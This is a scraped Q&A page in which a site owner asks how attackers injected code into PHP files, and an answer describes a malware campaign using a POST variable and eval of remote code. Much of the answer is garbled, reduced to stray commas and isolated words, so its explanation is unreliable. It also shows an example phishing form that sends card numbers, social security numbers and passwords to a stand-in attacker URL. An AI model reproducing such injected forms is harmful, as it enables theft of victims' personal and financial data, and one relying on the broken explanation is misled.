Geek Answers Handbook

Hackers added content to my PHP files.

My site was taken by hackers, and looking at the site, additional material is loaded at the top of each PHP file.

Each file now starts with:

GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{

Full complement here

Everything seems to be fine in the database, so I'm wondering what is the likely login path for editing my files?

+5
source share
3 answers

You are not the first to hit airschk

The exploit is based on a POST request with a variable set prgetxr.

(, , ), - IP mynetsxx, , IP , ( "", , , , , , ), , rewrioutclbkxxx. , GET, GET showmeallpls.

rewrioutclbkxxx , , , , , .

, , , , , .

hxxp://airschk.com/clk ( HTTP URL-), , , : user-agent (.. ), IP-, URL- , , 4dae82ac67843a194c000ca1, , , .

, , airschk . EVAL. , pwn'd.

EVAL , php. , , , . pwnt.

, , POST ? , , URL- toolbarqueries.google.com, URL- Google URL- (Blackhat SEO, Google , ).

, ,

  • airschk.
  • , , ( , )
  • google , Google.
  • - prgetxr GET- showmeallpls.

,

, IP-, , , . , , HTML:

<form method="post" action="./login.php">
    <input name="BankAccountNumber" />
    <input name="Password" />
</form>

, , , :

<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
    <input name="CreditCardNumber" />
    <input name="SocialSecurityNumber" />
    <input name="FullName" />
    <input name="DateOfBirth" />
    <input name="HomeAddress" />

    <input name="BankAccountNumber" />
    <input name="Password" />
    <input name="prgetxr" />
</form>

.

, , . .

? ? , -, , , , . Nuke .

chmod, -, , - . unix.

eval , ( suhosin). - , , . . .

, 12 , , , .

, , SO.

, -, .

. , , , .

+17

, , . -, .., http://www.auditmypc.com/firewall-test.asp, .

+1

Check the download part if your site can load. A hacker can download a script and modify your files.

0
source

More articles:


All Articles